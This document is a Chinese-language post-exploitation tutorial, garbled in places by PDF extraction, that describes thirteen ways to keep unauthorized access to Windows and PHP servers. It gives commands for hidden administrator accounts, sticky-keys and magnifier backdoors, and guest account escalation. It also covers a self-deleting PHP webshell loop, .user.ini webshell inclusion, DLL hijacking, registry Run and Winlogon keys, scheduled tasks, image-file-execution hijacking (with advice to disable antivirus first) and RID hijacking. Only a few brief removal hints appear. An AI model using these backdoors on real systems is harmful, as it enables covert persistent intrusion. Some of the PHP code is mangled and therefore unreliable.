后渗透之权限维持的13种方法 作者乌云安全

1、后渗透之权限维持的13种方法 作者：乌云安全 原文链接：/s/Ba2NMu5ZfTxkMuerbiX2KA本文由 干货 收集整理：/test/index.php0x1用户net user administrator$ woaijiushi /add & net localgroup administrators administrator$ /addPS：通过在用户后面添加$符号的形式将用户达到隐藏的效果。 可以通过注册表或直接用户管理删除隐藏的用户。 0x2 Shift 后门1. 将 C:WINDOWSsyst

2、em32dllcachesethc.exe 删除，这个文件夹中放着缓存，如果不删除就会自动变回去。 2. 删除 C:WINDOWSsystem32 下的 sethc.exe 文件。 3. 重命名 C:WINDOWSsystem32 下的 cmd.exe 为 sethc.exe 。4. 按下 5下 shift 即可弹出管理权限的 DOS 窗口。 10x3 放大镜后门创建 magnify.batecho offnet user administrator$ woaijiushi /addnet localgroup administrators hack$ /add%Windir%system32

3、nagnify.exeexit利用bat2com/ com2exe，BatToEXE(图形化工具)等工具把Bat文件转换成exe文件，bat2commagnify.bat# 将magnify.bat转换成# 将转换成magnify.exe将生成的 magnify.exe 分别替换掉 C:WINDOWSsystem32dllcache 下的 magnify.exe 和C:WINDOWSsystem32 下的 magnify.exe登陆时通过组合键 Win+U 调用。 上述方法检查及清除检查“HKEY_LOCAL_MA

4、CHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Option”注册表路径中的程序名称 2其它适用于的辅助功能还有:1. 屏幕键盘： C:WindowsSystem32osk.exe2. 放大镜： C:WindowsSystem32Magnify.exe3. 旁白： C:WindowsSystem32Narrator.exe4. 显示开关： C:WindowsSystem32DisplaySwitch.exe5. 应用程序开关： C:WindowsSystem32AtBroker.exePS： 现在大部分的杀毒

5、软件都会监视注册表项来防御这种恶意行为。 0x4 隐藏属性后门文件将木马文件属性改为“隐藏” ，成系统文件或数据库文件等，修改时间跟系统文件时间类似。 0x5 PHP内存型木马(不死马)创建 inc_data_config.php 文件?phpset_time_limit(0);ignore_user_abort(1); unlink( FILE );while(1)file_put_contents(inc_data_config.php,3);$b=array_keys($a)0;eval($b);?);sleep(5);?ignore_user_abort() 函数设置与客户机断开是否会

6、终止脚本的执行。 这里设置为true则忽略与用户的断开，即使与客户机断开脚本仍会执行。 set_time_limit() 函数设置脚本最大执行时间。 这里设置为0，即没有时间方面的限制。 unlink( FILE ) 删除文件本身，以起到隐蔽自身的作用。 此脚本会每5秒不断的向服务器生成一个“inc_data_config.php”的一句话木马。 清除脚本只需要重启http服务。0x6 .user.ini文件构成的PHP后门指定一个文件，自动包含在要执行的文件前，类似于在文件前调用了require()函数。 而auto_append_file类似，只是在文件后面包含。 使用方法很简单，直接写在

7、.user.ini中： auto_prepend_file=01.gif我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件，而这个文件可以是一个正常php文件，也可以是一个包含一句话的webshell01.gif3直接访问下面链接即可利用： /index.php?cmd=phpinfo();0x7 使用已经禁用的guest账户进行登录控制面板所有控制面板项用户帐户管理帐户启用来宾帐户 net user guest woaijiushi & net localgroup administrators guest /add net use

8、r guest /active:yes/ 激活guest用户 0x8 DLL 劫持在加载DLL过程中，系统都是先在程序目录加载DLL，如果没有找到就按照规定的顺序去搜索，但如果DLL的路径没有在system32中，攻击者就有可能一个dll被程序加载。 系统在使用DLL搜索顺序取决于世否启用安全的DLL搜索模式 。PS： WindowsXP默认情况下禁用安全DLL搜索模式。 之后默认启用安全DLL搜索模式 若要使用此功能，需创建 HKEY_LOCAL_MACHINESystemCurrentControlSetControlSession ManagerSafeDllSearchMode 注册表

9、值，0为禁止，1为启用。 SafeDLLSearchMode启用后，搜索顺序如下： .5.6.从其中加载应用程序的目录、 系统目录。使用GetSystemDirectory函数获取此目录的路径。 16位系统目录。没有获取此目录的路径的函数，但会搜索它。Windows目录。 使用GetWindowsDirectory函数获取此目录。 当前目录。 PATH环境变量中列出的目录。 SafeDLLSearchMode禁用后，搜索顺序如下： .5.6.从其中加载应用程序的目录当前目录 系统目录。使用GetSystemDirectory函数获取此目录的路径。 16位系统目录。没

10、有获取此目录的路径的函数，但会搜索它。Windows目录。 使用GetWindowsDirectory函数获取此目录。 PATH环境变量中列出的目录。 DLL劫持利用搜索顺序来加载恶意DLL以代替合法DLL。 如果应用程序使用Windows的DLL搜索来查找DLL，且攻击者可以将同名DLL的顺序置于比合法DLL更高的位置，则应用程序将加载恶意DLL。 可以用来劫持系统程序，也可以劫持用户程序。 劫持系统程序具有兼容性，劫持用户程序则有针对性。 结合本文的主题，这里选择劫持系统程序。 4可以劫持的dll有：lpk.dll、usp10.dll、msimg32.dll、midimap.dll、ksu

11、ser.dll、comres.dll、ddraw.dll以lpk.dll为列，explorer桌面程序的启动需要加载lpk.dll，当进入桌面后lpk.dll便被加载了，劫持lpk.dll之后，每次启动系统，自己的lpk.dll都会被加载，实现了持久化攻击的效果。 0x9 注册表开机自动启动项1. Load注册键HKEY_CURRENT_USERSoftwareMicrosoftWindowsNTCurrentVersionWindows/ 建一个字符串名为load键值 2. WinlogonUserinit注册键找到“Userinit”这个键值，这个键值默认为c:WINNTsystem32u

12、serinit.exe，后面加路径，再加逗号也可以。 这里也能够使系统启动时自动初始化程序。 通常该注册键下面有一个userinit.exe，但这个键允许指定用逗号分隔的多个程序，例如“userinit.exe,OSA.exe”（不含引号）。 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonHKEY_CURRENT_USERSOFTWAREMicrosoftWindowsNTCurrentVersionWinlogon3. ExplorerRun注册键HKEY_CURRENT_USERSoftwareMicro

13、softWindowsCurrentVersionPoliciesExplorerRunHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorerRun4. RunServicesOnce注册键HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunServicesOnceHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServicesOnce5. 常用注册键HKEY_CURREN

14、T_USERSoftwareMicrosoftWindowsCurrentVersionRunHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnceHKEY_CURRENT_USERSoftwareMicrosoft测试部分成功执行。 560x10 计划任务schtasks /create /sc ONLOGON /tr C:WindowsSystem32cmd.exe /tn test命令详解： scht

15、asks /create 参数：/sc schedule ONLOGON每当用户（任意用户）登录的时候，任务就运行。可以指定日期，或在下次用户登录的时候运行任务。 /tr 指定任务运行的程序或命令。键入可执行文件、脚本文件或批处理文件的完全合格的路径和文件名;如果忽略该路径，SchTasks.exe 将假定文件在 SystemrootSystem32 目录下。 /tn 指定任务的名称 关机重启显示效果 7指定时间运行任务 schtasks /create /sc daily /st 00:00:00 /tr calc.exe /tn test1参数详解 /st StartTime以 HH:MM

16、:SS 24 小时格式指定时间。默认值是命令完成时的当前本地时间。/st 参数只对于 MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY 和 ONCE 计划有效。它只对于 ONCE 计划是必需的。 schtasks命令详解 schtasks常见错误删除计划任务 schtasks /Delete /TN 任务名称 /F0x11 文件夹启动在每次开机或重启的时候就会运行启动文件夹下的程序。 C:UsersppbiboAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupC:ProgramDataMicrosoftWindow

17、sStart MenuProgramsStartup0x12 映像劫持在下面注册表 8HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options在此路径下创建一个子项，子项的名称为你要劫持的 exe 名称，比如说cmd.exe 然后创建一个值，值名为Debugger, 值为要执行的恶意脚本。 运行 cmd.exe 时执行成功运行 calc.exe注意： 这个会让安全软件拦截，所以要先退出杀软。 0x13 RID 劫持新建一个普通用户 admin在下面注册表中 HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames找到 admin 对于Windows系统来说，注册表下包含当前系统的所有帐户列表，